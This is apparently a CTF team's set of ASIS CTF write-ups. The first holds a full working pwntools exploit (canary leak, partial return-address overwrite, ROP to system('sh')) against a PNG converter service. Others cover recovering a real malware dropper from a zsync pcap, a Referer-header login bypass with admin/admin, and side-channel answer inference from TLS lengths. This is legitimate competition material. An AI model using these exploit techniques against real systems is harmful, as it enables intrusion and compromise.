This challenge was an image conversion service which expected a PNG file and converted into a PPM file. PPM is a simple text-based image format, here is the wikipedia page describing it: https://en.wikipedia.org/wiki/Netpbm_format

The main vulnerability was a stack buffer overflow, because it allocated a buffer with the size of width * height * bitsPerPixel and copied the PNG’s decompressed zlib data (except the filter field) to the buffer which does not respected the allocated buffer’s size.

The main problem was that we also overwrote the stack canary and it was a 64-bit ASLR-enabled PIE binary (as the challenge website stated so) which did not fork, so new canary generated for every new connection:

alt

Luckily there was an other vulnerability: the PNG file format uses a method called Filtering which can help to reduce the size of the file by only storing the differences with the pixel to the left or the pixel above etc. You can read about it here: https://en.wikipedia.org/wiki/Portable_Network_Graphics#Filtering

So if we tried to read the previous row in first row, then it read before our buffer. This way we could read the stack cookie from the previous function call. Although I am not 100% sure, but I think the binary was compiled with -fstack-protector-all, because there was stack cookie in every function. In this case maybe this paranoid setting caused more harm than good… :)

I had to experiment a bit with the width / height / with or without alpha channel options. As I had to switch between the “copy the above line” (2) filter (for the stack cookie) and “copy the exact values” (0) filter (for the return address). Finally I created a 6*1 PNG with alpha channel.

This way we could overwrite the stack cookie and we had RIP control. BUT as the binary was a PIE binary we had not fix addresses where we could jump. Or do we?

Basically the return address points to a valid memory address, to the next instruction after the sub_1560 call. So if we partially overwrite the return address, we can jump somewhere in the png2ppm binary.

Practically I jumped to the program’s start again as at this point I already had a lot of leaked addresses as the result of the conversion contained the stack cookie, an address from the stack, and an address from the png2ppm binary (although I had to mix the address bytes from the pixelmap and the alpha map, because the conversion divided the values into two different files).

Only one thing separated me from getting a shell: a libc address :)

Because I know the program’s base address at this point, I could jump to the puts PLT and print out the GOT table. So I got the puts function’s libc address and calculated the system’s address from it.

So in the next ROP chain I could call the system with “sh”. For this I had to calculate the “sh” string’s address from the stack (I could calculate this, because I already had a stack address leak).

Because of the partial overwrite, I also overwrote 4 bits from the ASLR random part, so for the real server I had to run the exploit multiple times to hit the correct address with a 1/16 change (locally I debugged it with disabled ASLR).

Finally I could print the flag out:

ASIS{487e532d3aae05f1717f46104ba4ebf6}

Exploit code

import sys
import binascii
import struct
import zlib
from pwn import *
from time import sleep

for iTry in xrange(64):
    print "Try #%d / 64" % (iTry + 1)
    try:
        p = remote('185.106.120.22', 1337)

        time.sleep(0.5)

        def getChunk(data):
            return struct.pack('>I', len(data) - 4) + data + struct.pack('>i', binascii.crc32(data))

        def convertPng(width, height, plain):
            pngHdr = "\x89PNG\x0d\x0a\x1a\x0a";
            iHdr = getChunk("IHDR" + struct.pack('>II', width, height) + "\x08\x06\x00\x00\x00")
            iDat = getChunk("IDAT" + zlib.compress(plain))
            iEnd = getChunk("IEND")
            pngData = pngHdr + iHdr + iDat + iEnd
            p.send(str(len(pngData)) + '\n' + pngData)

        #system = "\x2e\x5d"
        mainPart = "\x79\x5a"

        convertPng(6, 1, ("\x02" + "\x00" * 24) * 6 + "\x00"*9 + mainPart)

        p.recvuntil('\n255\n')
        leakLine1 = p.recvline().strip()
        p.recvuntil('\n255\n')
        leakLine2 = p.recvline().strip()
        print "Leak lines = %r, %r" % (leakLine1, leakLine2)

        leakStr1 = ''.join([chr(int(x)) for x in leakLine1.split(' ')])
        leakStr2 = ''.join([chr(int(x)) for x in leakLine2.split(' ')])
        cookieLeak = u64(leakStr1[0:3]+leakStr2[0]+leakStr1[3:6]+leakStr2[1])
        stackBase = u64(leakStr1[6:9]+leakStr2[2]+leakStr1[9:12]+leakStr2[3]) - 0x1fc60 - 0x480
        prgBase = u64(leakStr1[12:15]+leakStr2[4]+leakStr1[15:18]+leakStr2[5]) - 0x184e
        print "Leaks: cookie = 0x%016x, stack = 0x%016x, prg = 0x%016x" % (cookieLeak, stackBase, prgBase)

        puts = prgBase + 0xa20
        putsGot = prgBase + 0x202f48
        popRdi = prgBase + 0x1b53
        main = prgBase + (((ord(mainPart[1]) - 0x40) << 8) + ord(mainPart[0]))
        rbx = "BBBBBBBB"
        rbp = "CCCCCCCC"
        ret = "DDDDDDDD"

        convertPng(64, 1, "\x00"*(1+64*4)+"\x00" + "X"*80 + p64(cookieLeak) + "XXXXXXXX"+rbx+rbp+p64(popRdi)+p64(putsGot)+p64(puts)+p64(main))
        p.recvuntil('\n255\n')
        p.recvuntil('\n255\n')
        p.recvline()
        putsLeak = u64(p.recvline()[:-1]+'\x00'*2)
        print "puts leak = 0x%016x" % putsLeak

        putsLocal = 0x7ffff786be30
        systemLocal = 0x7ffff7842640
        remoteSystem = putsLeak - putsLocal + systemLocal

        stackBaseLocal = 0x7ffffffde000
        binShLocal = 0x7fffffffe0e8
        binShRemote = stackBase - stackBaseLocal + binShLocal

        convertPng(64, 1, "\x00"*(1+64*4)+"\x00" + "X"*80 + p64(cookieLeak) + "XXXXXXXX"+rbx+rbp+p64(popRdi)+p64(binShRemote)+p64(remoteSystem)+"sh\x00")

        p.send('cat flag\n')
        p.interactive()
        break
    except:
        try:
            p.close()
        except:
            pass
        print "Fail!"

This challenge was solved by and the write up was written by one of my teammates, gym.

In this challenge we are provided with a pcap of a zsync transfer. Zsync is a file transfer program that allows you to download a file from a remote server, where you have a copy of an older version of the file on your computer already. Zsync downloads only the new parts of the file, and transfers them over HTTP.

The zsync headers are the following:

zsync: 0.6.2
Filename: Particles
MTime: Wed, 12 Aug 2015 05:35:27 +0000
Blocksize: 2048
Length: 1125888
Hash-Lengths: 2,2,4
URL: Particles
SHA-1: 9be3800b49e84e0c014852977557f21bcde2a775

Each transfer contains the hash of the file and blocks that are being transferred. We can see that the SHA1 hash of the original file is:

9be3800b49e84e0c014852977557f21bcde2a775

Searching for this hash value we can find out that the original file is the Operation Potatoe viruses dropper (https://github.com/eset/malware-ioc/blob/master/potao/README.adoc). Some further search leads us to https://www.hybrid-analysis.com/sample/61dd8b60ac35e91771d9ed4f337cd63e0aa6d0a0c5a17bb28cac59b3c21c24a9?environmentId=4 where we can aquire the original sample.

At this point we can either examine the headers manually and restore the final file (each header contains the blocks and the number of bytes being transferred):

HTTP/1.1 206 Partial Content
Date: Fri, 09 Oct 2015 16:09:56 GMT
Server: Apache/2.4.9 (Win64) PHP/5.5.12
Last-Modified: Fri, 09 Oct 2015 10:22:06 GMT
ETag: "112e00-521a959f56f80"
Accept-Ranges: bytes
Content-Length: 1024
Content-Range: bytes 73728-74751/1125888
Connection: close

Or we can use the Xplico (http://www.xplico.org/) opensource network forensics tool to do this for us.

The final file is a windows binary with the modified dropper code, running it in a windows vm we receive an error message that prints the 32 bit hash value.

ASIS{c295c4f709efc00a54e77a027e36860c} is the flag.

KT’s alternative, “facepalm” solution

Meanwhile gym solved the challenge, I searched for every SHA-1 in the pcap.

9be3800b49e84e0c014852977557f21bcde2a775 - the real malware sample
e227c6d298358d53374decb9feaacb463717e2d9 - no results
2d27f6e5bafdf23c7a964a325ebf3a5ee9ca4b18 - no results
8f1fa762c3bf865d0298e7a8fd3640c606962122 - no results
7e05370d87196157bc35f920d7fcf27668f8e8af - no results
e8c7d65370947b40418af55bdc0f65e06b7b0c59

And at the last hash throw the following result: https://www.hybrid-analysis.com/sample/688a3ac91914609e387111e6382911ecd0aefe9f4f31bed85438b65af390cf6f?environmentId=1

And if I scrolled down to the middle of the page I saw the following screenshot:

alt

I liked this part especially as this looked like exactly as a flag. :)

alt

It was the flag of course. :D

First I thought maybe this was the intended solution, but then I saw the upload date and it was clear that somebody (probably an other team) uploaded the malware sample meanwhile the CTF, so it was a really facepalm moment for me. :)

And in spite of that the flag could be found this easily only a few team solved the challenge.

gym was not too happy when I told him that I just sent in the flag meanwhile he was working hard on solving the challenge :)

This challenge was solved by and the write up was written by one of my teammates, nguyen

http://myblog.asis-ctf.ir:8088/robots.txt

User-agent: *
Disallow: /myblog_private_dir3ct0ry

From printing feature you can see the page by sending the correct referer header. Referer: http://myblog.asis-ctf.ir:8088/myblog_private_dir3ct0ry/

GET /printpage.php?id=2417648298 HTTP/1.1
Host: myblog.asis-ctf.ir:8088
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://myblog.asis-ctf.ir:8088/myblog_private_dir3ct0ry/?username=admin&password=admin
Connection: keep-alive

After some combinations of commons params name I decided to send them all

Referer: http://myblog.asis-ctf.ir:8088/myblog_private_dir3ct0ry/?username=admin&password=admin&login=admin&user=admin

And I got this pdf has flag:

ASIS{9c846eab5200c267cb593437780caa4d}

We got the following file:

(((_____ << __) + _) << ((((_____ << __) - _) << ____) - _)) - (((((___ << __) - _) << __) + _) << (((((_ << ___) + _)) << _____) + (_ << __))) + (((_______ << _____) - _______) << ((((_ << ____) + _) << ____) + (___ << _))) - (((_ << _______) - ___) << ((((_ << ____) + _) << ____) - ___)) + (((((___ << __) + _) << ____) - ___) << ((_ << ________) + (_ << _))) + (((___ << ______) + _____) << ((((_ << ____) - _) << ____) + _______)) - (((((_ << ____) - _) << ____) - ___) << ((((_ << ____) - _) << ____) - ___)) + (((((___ << __) - _) << _____) + ___) << ((_______ << _____))) + (((_______ << _____) + _) << ((((___ << __) + _) << ____) + (___ << _))) - (((((___ << __) - _) << ___) - ___) << ((((___ << __) + _) << ____) - ___)) + (((((_____ << __) - _) << ____) + ___) << ((___ << ______))) + (((((___ << __) + _) << ___) - ___) << ((___ << ______) - (_ << ___))) + (((___ << ______) + _) << ((((___ << __) - _) << ____) - (_ << _))) - (((((_____ << __) - _) << ____) + ___) << ((_____ << _____) + ___)) - (((_______ << _____) + _____) << ((((_____ << __) - _) << ___) + _)) - (((((___ << __) + _) << ____) - _____) << (((((_ << ___) + _)) << ____))) + (((___ << ______) + _) << ((((_ << ____) + _) << ___) - (_ << _))) - (((((_ << ____) - _) << __) + _) << ((_ << _______) - ___)) + (((((___ << __) + _) << ____) - ___) << ((_______ << ____) + (_ << _))) + (_______ << ((((___ << __) + _) << ___) + ___)) + (((_______ << ____) - ___) << ((___ << _____) - _)) - (((((_ << ____) - _) << __) + _) << ((((___ << __) - _) << ___) - _)) - (((((___ << __) + _) << ___) + ___) << ((_____ << ____) - (_ << _))) - (((((_ << ____) - _) << ___) - ___) << ((((_ << ____) + _) << __) + _)) + (((_____ << ____) + ___) << ((((_ << ____) - _) << __))) + (((_____ << ___) - _) << ((((___ << __) + _) << __) - _)) + (((_______ << ___) + _) << ((_____ << ___))) + (((_ << _____) - _) << ((_ << _____) + (_ << _))) - (((((___ << __) - _) << __) - _) << ((((___ << __) + _) << _))) - (((___ << ___) - _) << ((_____ << __) - _)) + (((_____ << __) + _) << ((___ << __))) + ((((___ << __) + _)) << ______) + _ 

You have to replace the underscore with a number depending how many underscore followed each other. So _ becomes 1, __ becomes 2, etc. Then you get the following expression:

(((5 << 2) + 1) << ((((5 << 2) - 1) << 4) - 1)) - (((((3 << 2) - 1) << 2) + 1) << (((((1 << 3) + 1)) << 5) + (1 << 2))) + (((7 << 5) - 7) << ((((1 << 4) + 1) << 4) + (3 << 1))) - (((1 << 7) - 3) << ((((1 << 4) + 1) << 4) - 3)) + (((((3 << 2) + 1) << 4) - 3) << ((1 << 8) + (1 << 1))) + (((3 << 6) + 5) << ((((1 << 4) - 1) << 4) + 7)) - (((((1 << 4) - 1) << 4) - 3) << ((((1 << 4) - 1) << 4) - 3)) + (((((3 << 2) - 1) << 5) + 3) << ((7 << 5))) + (((7 << 5) + 1) << ((((3 << 2) + 1) << 4) + (3 << 1))) - (((((3 << 2) - 1) << 3) - 3) << ((((3 << 2) + 1) << 4) - 3)) + (((((5 << 2) - 1) << 4) + 3) << ((3 << 6))) + (((((3 << 2) + 1) << 3) - 3) << ((3 << 6) - (1 << 3))) + (((3 << 6) + 1) << ((((3 << 2) - 1) << 4) - (1 << 1))) - (((((5 << 2) - 1) << 4) + 3) << ((5 << 5) + 3)) - (((7 << 5) + 5) << ((((5 << 2) - 1) << 3) + 1)) - (((((3 << 2) + 1) << 4) - 5) << (((((1 << 3) + 1)) << 4))) + (((3 << 6) + 1) << ((((1 << 4) + 1) << 3) - (1 << 1))) - (((((1 << 4) - 1) << 2) + 1) << ((1 << 7) - 3)) + (((((3 << 2) + 1) << 4) - 3) << ((7 << 4) + (1 << 1))) + (7 << ((((3 << 2) + 1) << 3) + 3)) + (((7 << 4) - 3) << ((3 << 5) - 1)) - (((((1 << 4) - 1) << 2) + 1) << ((((3 << 2) - 1) << 3) - 1)) - (((((3 << 2) + 1) << 3) + 3) << ((5 << 4) - (1 << 1))) - (((((1 << 4) - 1) << 3) - 3) << ((((1 << 4) + 1) << 2) + 1)) + (((5 << 4) + 3) << ((((1 << 4) - 1) << 2))) + (((5 << 3) - 1) << ((((3 << 2) + 1) << 2) - 1)) + (((7 << 3) + 1) << ((5 << 3))) + (((1 << 5) - 1) << ((1 << 5) + (1 << 1))) - (((((3 << 2) - 1) << 2) - 1) << ((((3 << 2) + 1) << 1))) - (((3 << 3) - 1) << ((5 << 2) - 1)) + (((5 << 2) + 1) << ((3 << 2))) + ((((3 << 2) + 1)) << 6) + 1 

You can evaluate in this for example in python to this number:

341864076565289913991194230839622826699458146321693262127464374283953336041975703075161723713

Converting this number to ASCII (for example with my JS tools on kt.pe) gives you the flag:

ASIS{981e1ea684c8055f60e3a58cabb4c060}

This challenge was solved by and the write up was written by one of my teammates, AKG and me

First of all we found the mbti page (mbti.asis-ctf.ir) in the pcap file (ClientHello sent the host name to support SNI - Server Name Identification), which was a simple Myers–Briggs Type Indicator test (each question with 4 answers).

We found out that the text in the question depends on the previous answer, and the length of the texts differ.

After this we collected the data lengths from the pcap file (with scapy) and the questions lengths for each question-previous answer pairs (manually) and used some statistics to find out what the answers the candidate provided.

We had to install the scapy-ssl_tls plugin.

With this command we converted the pcap content to a more easily parsable text document:

open('mbti.txt','w').write('\n'.join([x.command() for x in rdpcap('mbti.pcap')]));

And then filtered for the response packet lengths (in C# this time):

var vals = File.ReadLines(@"mbti.txt").Where(x => x.Contains("dst='192.168.110.13'") && x.Contains("content_type=23")).
    Select(x => Regex.Match(x, @"TLSRecord\(length=(\d+)").Groups[1].Value).Where(x => !String.IsNullOrWhiteSpace(x)).Select(x => int.Parse(x)).ToArray();

var valsRev = File.ReadLines(@"mbti.txt").Where(x => x.Contains("src='192.168.110.13'") && x.Contains("content_type=23")).
    Select(x => Regex.Match(x, @"TLSRecord\(length=(\d+)").Groups[1].Value).Where(x => !String.IsNullOrWhiteSpace(x)).Select(x => int.Parse(x)).ToArray();

var data = Enumerable.Range(0, vals.Length).Select(idx => new { idx, requestLen = valsRev[idx], responseLen = vals[idx] }).ToArray();
var respLens = new[] { 1635 }.Concat(data.Where(x => x.requestLen == 628).Select(x => x.responseLen).Take(24).ToArray());

var respMin = respLens.Min();
var respMax = respLens.Max();
var respPerc = respLens.Select(x => (double)(x - respMin) / (respMax - respMin)).ToArray();

var questions = File.ReadAllLines(@"mbti_path.txt").Select(x => Regex.Match(x, @"Q(\d+)A(\d+) = (.*)")).
    Select(m => new QuestionData { Q = int.Parse(m.Groups[1].Value), A = int.Parse(m.Groups[2].Value), Text = m.Groups[3].Value }).ToArray();

foreach (var q in questions)
    q.Text = q.Q + " " + q.Text;

var textMin = questions.Min(x => x.Text.Length);
var textMax = questions.Max(x => x.Text.Length);

foreach (var q in questions)
{
    q.Len = q.Text.Length;
    q.Perc = (double)(q.Len - textMin) / (textMax - textMin) / 0.795;
}

var searcher = questions.GroupBy(x => x.Q).Select((x, i) => new { Q = x.First().Q, good = respPerc[i], choices = x.ToArray() }).ToArray();
var searcherStr = String.Join("\r\n\r\n", searcher.Select(x => "Question #" + x.Q + " => " + x.good.ToString("0.0000") + "\r\n" + String.Join("\r\n", x.choices.Select(y => "[ ] " + y.ToString()))));
var answer = String.Join("", searcher.Select(x => x.choices.OrderBy(y => Math.Abs(y.Perc - x.good)).First().A));

This file contains the 100 questions and to path to reach them: mbti_path.txt

This generated the template of following output:

  • Question #0 is the answer to the age question (your name does not matter)
  • The number after the question if the relative length of the response found in the pcap
  • The “P” values of the answers are the calculated relative lengths of that answer
  • The smaller the difference between the two numbers the more likely that that answer was choosen
Answer = 1101131103330121020113013

Question #0 => 0,3651
[ ] Q:00 A:0 L:093 P:0,5221 = You feel unsatisfied if you know the answer to a problem, but do not completely understand it
[X] Q:00 A:1 L:073 P:0,3639 = You prefer to act immediately rather than speculate about various options
[ ] Q:00 A:2 L:038 P:0,0870 = You are very consistent in your habits
[ ] Q:00 A:3 L:063 P:0,2848 = You are a person somewhat reserved and distant in communication

Question #1 => 0,7698
[ ] Q:01 A:0 L:076 P:0,3876 = You usually place yourself nearer to the side than in the center of the room
[X] Q:01 A:1 L:124 P:0,7674 = You are mainly interested in things other than human, You prefer good books or even a good Computer rather than good friends
[ ] Q:01 A:2 L:123 P:0,7595 = You think that everyone's views should be respected regardless of whether they are supported by facts or not or even by you
[ ] Q:01 A:3 L:077 P:0,3956 = You often get so lost in thoughts that you ignore or forget your surroundings

Question #2 => 0,0476
[X] Q:02 A:0 L:033 P:0,0475 = It's difficult to get you excited
[ ] Q:02 A:1 L:131 P:0,8228 = You are almost never late for your appointments, and get angry when other people are late or try to make excuses for their lateness
[ ] Q:02 A:2 L:134 P:0,8465 = You tend to be unbiased even if this might endanger your good relations with people, but try to stay calm when people nagging about it
[ ] Q:02 A:3 L:066 P:0,3085 = Interesting book or video game is often better than a social event

Question #3 => 0,0000
[ ] Q:03 A:0 L:151 P:0,9810 = You always prefer inclined to experiment than to follow familiar approaches, in this way you can experince something that maybe no one could experince!
[X] Q:03 A:1 L:027 P:0,0000 = You feel at ease in a crowd
[ ] Q:03 A:2 L:098 P:0,5617 = You find it difficult to speak loudly in public places and think that people find it very annoying
[ ] Q:03 A:3 L:071 P:0,3481 = You are inclined to rely more on improvisation than on careful planning

Question #4 => 0,7937
[ ] Q:04 A:0 L:068 P:0,3244 = You are always looking for opportunities and don't like to miss them
[X] Q:04 A:1 L:127 P:0,7911 = You prefer to spend your leisure time alone or relaxing in a tranquil family atmosphere, but always being home bothers you alot
[ ] Q:04 A:2 L:112 P:0,6724 = You find it easy to stay relaxed and focused even when there is some pressure and could work under that oressure
[ ] Q:04 A:3 L:053 P:0,2057 = Your desk, workbench etc. is usually neat and orderly

Question #5 => 1,0000
[ ] Q:05 A:0 L:128 P:0,7990 = If your friend is sad about something, you are more likely to offer emotional support than suggest ways to deal with the problem
[ ] Q:05 A:1 L:100 P:0,5775 = If you go to the gym or the library or the park, you find a place by yourself and focus on your work
[ ] Q:05 A:2 L:047 P:0,1582 = You enjoy having a wide circle of acquaintances
[X] Q:05 A:3 L:153 P:0,9968 = You frequently and easily express your feelings and emotions, it doesn't matter with new people or not, the moment you start, there is no way to stop you

Question #6 => 0,7222
[ ] Q:06 A:0 L:067 P:0,3164 = You find it difficult to talk about your feelings with other people
[X] Q:06 A:1 L:118 P:0,7199 = When considering a situation you pay more attention to the current situation and less to a possible sequence of events
[ ] Q:06 A:2 L:035 P:0,0633 = You value justice higher than mercy
[ ] Q:06 A:3 L:069 P:0,3323 = It is easy for you to communicate in social situations and new people

Question #7 => 0,2302
[ ] Q:07 A:0 L:089 P:0,4905 = You are product-oriented and want to get the job done and not interested only in progress
[X] Q:07 A:1 L:056 P:0,2294 = It is in your nature to assume responsibility for others
[ ] Q:07 A:2 L:088 P:0,4826 = Being able to develop a plan and stick to it is the most important part of every project
[ ] Q:07 A:3 L:078 P:0,4035 = Strict observance of the established rules is likely to prevent a good outcome

Question #8 => 0,5952
[X] Q:08 A:0 L:102 P:0,5933 = Deadlines seem to you to be of relative, rather than absolute, importance and you never scared of them
[ ] Q:08 A:1 L:091 P:0,5063 = You know how to put every minute of your time to good purpose and feelling great after that
[ ] Q:08 A:2 L:054 P:0,2136 = You like to be engaged in an active and fast-paced job
[ ] Q:08 A:3 L:144 P:0,9256 = You are usually the first to react to a sudden event: the telephone ringing or unexpected question, that doesn't matter, you will always answer!

Question #9 => 0,2698
[ ] Q:09 A:0 L:135 P:0,8544 = You rapidly get involved in social life at new workplaces and can work with new people specially when they let you share your new ideas
[ ] Q:09 A:1 L:040 P:0,1028 = You tend to sympathize with other people
[ ] Q:09 A:2 L:044 P:0,1345 = You could easily affected by strong emotions
[X] Q:09 A:3 L:060 P:0,2611 = You often think about humankind and its destiny in your life

Question #10 => 0,7222
[ ] Q:10 A:0 L:057 P:0,2373 = You are good at speculating about all the various options
[ ] Q:10 A:1 L:109 P:0,6487 = You have good control over your desires and temptations and could leave out what you want in speciall moments
[ ] Q:10 A:2 L:106 P:0,6250 = You feel involved when watching TV soaps, maybe cry with them and you get really upset or happy after them
[X] Q:10 A:3 L:117 P:0,7120 = If you could choose your in-flight neighbor, you would prefer someone silent to someone who is interesting to talk to

Question #11 => 0,5873
[ ] Q:11 A:0 L:080 P:0,4193 = You are more interested in a general idea than in the details of its realization
[ ] Q:11 A:1 L:095 P:0,5380 = You tend to rely on your experience rather than on theoretical alternatives, very experimental?
[ ] Q:11 A:2 L:052 P:0,1978 = Objective criticism is always useful in any activity
[X] Q:11 A:3 L:100 P:0,5775 = You respond with aggression when someone acts aggressively towards you and thet can change your mood

Question #12 => 0,9286
[X] Q:12 A:0 L:143 P:0,9177 = The process of searching for solution is more important to you than the solution itself, and always try to describe the seraching process first
[ ] Q:12 A:1 L:146 P:0,9414 = The more people with whom you speak, the better you feel, at work or in the family, you are always the person people come to talk about everything
[ ] Q:12 A:2 L:172 P:1,1471 = Winning a debate is more important to you than making sure no one gets upset during that debate, people thinks you don't care about their feelings when it comes to debates!
[ ] Q:12 A:3 L:143 P:0,9177 = You prefer meeting in small groups to interaction with lots of people, because of thet you rarley have new friends and try to avoid new friends

Question #13 => 0,6270
[ ] Q:13 A:0 L:086 P:0,4668 = When solving a problem you would rather follow a familiar approach than seek a new one
[X] Q:13 A:1 L:105 P:0,6171 = You often feel as if you have to justify yourself to other people and wait for them ti take what you said
[ ] Q:13 A:2 L:075 P:0,3797 = You don't usually initiate conversations and wait for other people to start
[ ] Q:13 A:3 L:097 P:0,5538 = If someone doesn't respond to your e-mail quickly, you start worrying if you said something wrong

Question #14 => 0,2302
[ ] Q:14 A:0 L:048 P:0,1661 = You think that almost everything can be analyzed
[ ] Q:14 A:1 L:085 P:0,4588 = You try to respond to your e-mails as soon as possible and cannot stand a messy inbox
[X] Q:14 A:2 L:055 P:0,2215 = You feel a constant need for something new in your life
[ ] Q:14 A:3 L:083 P:0,4430 = You like to keep a check on how things are progressing, and that make you confident

Question #15 => 0,5397
[ ] Q:15 A:0 L:099 P:0,5696 = It does not take you much time to start getting involved in social activities at your new workplace
[X] Q:15 A:1 L:094 P:0,5300 = You are strongly touched by the stories about people's troubles and don't like to be with them
[ ] Q:15 A:2 L:132 P:0,8307 = Your decisions are based more on the feelings of a moment than on the careful planning, maybe you regret what you decided after that
[ ] Q:15 A:3 L:092 P:0,5142 = Your work style is closer to random energy spikes than to a methodical or organized approach

Question #16 => 0,0159
[X] Q:16 A:0 L:028 P:0,0079 = You often do jobs in a hurry
[ ] Q:16 A:1 L:079 P:0,4114 = It's essential for you to try things with your own hands and get new experinces
[ ] Q:16 A:2 L:159 P:1,0443 = You prefer to isolate yourself from outside noises and stay at home, even when you are at home you are lonely at your room and don't like to be with family too
[ ] Q:16 A:3 L:087 P:0,4747 = You readily help people while asking nothing in return, mostly you are happy after that

Question #17 => 0,2778
[ ] Q:17 A:0 L:046 P:0,1503 = Your home and work environments are quite tidy
[ ] Q:17 A:1 L:116 P:0,7041 = Before answering a question, you always prefer to take the time to form an answer in your head and after that answer
[X] Q:17 A:2 L:061 P:0,2690 = You often feel like there are very few things that excite you
[ ] Q:17 A:3 L:082 P:0,4351 = Being adaptable is more important to you than being organized in work or education

Question #18 => 0,0873
[ ] Q:18 A:0 L:138 P:0,8781 = After prolonged socializing you will feel you need to get away and being alone, walking alone or being alone at home makes you feel better
[X] Q:18 A:1 L:037 P:0,0791 = You trust reason rather than feelings
[ ] Q:18 A:2 L:108 P:0,6408 = You take pleasure in putting things in order and think that being organized is what you need and others need
[ ] Q:18 A:3 L:114 P:0,6883 = You usually plan your actions in advance and stick to the plan, and it bothers when you can't manage all the plans

Question #19 => 0,8492
[ ] Q:19 A:0 L:050 P:0,1820 = Your actions are frequently influenced by emotions
[X] Q:19 A:1 L:133 P:0,8386 = You spend your leisure time actively socializing with a group of people, attending parties, shopping and taking with new people, etc.
[ ] Q:19 A:2 L:064 P:0,2927 = You easily see the general principle behind specific occurrences
[ ] Q:19 A:3 L:059 P:0,2532 = You easily understand new theoretical principles in no time

Question #20 => 0,0238
[ ] Q:20 A:0 L:130 P:0,8148 = You believe being consistent and stable is one of your best personal qualities and other people must like it or at least admire it
[X] Q:20 A:1 L:029 P:0,0158 = You see deadlines as elastics
[ ] Q:20 A:2 L:120 P:0,7357 = You could easily empathize with the concerns of other people and like other people would be more concerned about you too
[ ] Q:20 A:3 L:045 P:0,1424 = A thirst for adventure is close to your heart

Question #21 => 0,0794
[ ] Q:21 A:0 L:154 P:1,0047 = As a rule, current preoccupations worry you more than your future plans and what comes next, the most pressure is always what it is now that bothering you
[ ] Q:21 A:1 L:032 P:0,0396 = You believe any feeling is valid
[ ] Q:21 A:2 L:104 P:0,6092 = You often spend time thinking of how things could be improved and try to make things improved after that
[X] Q:21 A:3 L:036 P:0,0712 = You avoid being bound by obligations

Question #22 => 0,5079
[X] Q:22 A:0 L:090 P:0,4984 = You really get pleasure from solitary walks and often palns to do that especially in rain!
[ ] Q:22 A:1 L:062 P:0,2769 = You easily perceive various ways in which events could develop
[ ] Q:22 A:2 L:074 P:0,3718 = Often you prefer to read a book than go to a party and other pucliv places
[ ] Q:22 A:3 L:110 P:0,6566 = You get bored if you have to read theoretical books and never finish them completely, but get most of the book

Question #23 => 0,3492
[ ] Q:23 A:0 L:096 P:0,5459 = You do not mind being at the center of attention in a gathering or in work place or even at home
[X] Q:23 A:1 L:070 P:0,3402 = You willingly involve yourself in matters which engage your sympathies
[ ] Q:23 A:2 L:043 P:0,1266 = You do your best to complete a task on time
[ ] Q:23 A:3 L:170 P:1,1313 = You enjoy switching back and forth between tasks. In fact, You grow restless if you have to focus on only one task for too long at a time, and so you welcome some variety

Question #24 => 0,1984
[ ] Q:24 A:0 L:146 P:0,9414 = You often contemplate about the complexity of life and how hard it is, but always think that something could happen and could make the hard easier
[ ] Q:24 A:1 L:186 P:1,2579 = You prefer to work on one task at a time and to finish it before moving on to the next thing. Your efficiency goes down if you have to multitask, and so you find interruptions disruptive
[ ] Q:24 A:2 L:042 P:0,1187 = You try to stand firmly by your principles
[X] Q:24 A:3 L:051 P:0,1899 = You consider the scientific approach to be the best

As you can see in the most cases the answer was obvious, but we wasn’t sure about question #12 (there were 2 possibilities with the same 0.9177% relative length) and of course we didn’t know the answer to the last question.

This left us with 2 * 4 = 8 possibilities, which we tried out by hand:

First number is the answer to the question #12, second number is the answer to the last question.

00 - ASIS{d9df3ae429c782e3323e3f9ae2a5d931} - incorrect
01 - ASIS{7c435d15918d509985b6889201af96ac} - incorrect
02 - ASIS{f795bf214782f87ca9ebb4d3131a267d} - incorrect
03 - ASIS{6a2affd40db76ee918cb45df76ccc23f} - incorrect
30 - ASIS{bd72d3d93f7028afe3d986d8ed11ee93} - incorrect
31 - ASIS{a83a6b53c481a8cfea0277db30040edd} - incorrect
33 - ASIS{95b468a9d13ee4ebb5cfd19ead0fbc8a} - incorrect
32 - ASIS{01d3c6afe8046b28eef7ac98a19cae85} - good flag!

So the right combination was: 11011311033331210201130132, which gave us the right flag:

ASIS{01d3c6afe8046b28eef7ac98a19cae85}